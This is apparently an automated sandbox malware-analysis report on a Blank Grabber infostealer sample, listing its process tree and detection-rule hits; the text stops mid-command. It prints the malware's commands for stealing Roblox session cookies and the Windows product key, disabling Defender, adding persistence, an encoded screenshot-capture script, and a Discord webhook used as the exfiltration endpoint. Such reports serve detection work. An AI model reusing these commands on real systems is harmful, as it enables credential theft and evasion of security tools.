      • cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2180 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2008 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9144 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8992 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7756 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7920 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8092 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1284 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2032 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8868 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8388 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8440 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 8572 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 8 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'", ProcessId: 7596, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7604, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", ProcessId: 9144, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7700, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7932, ProcessName: powershell.exe
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 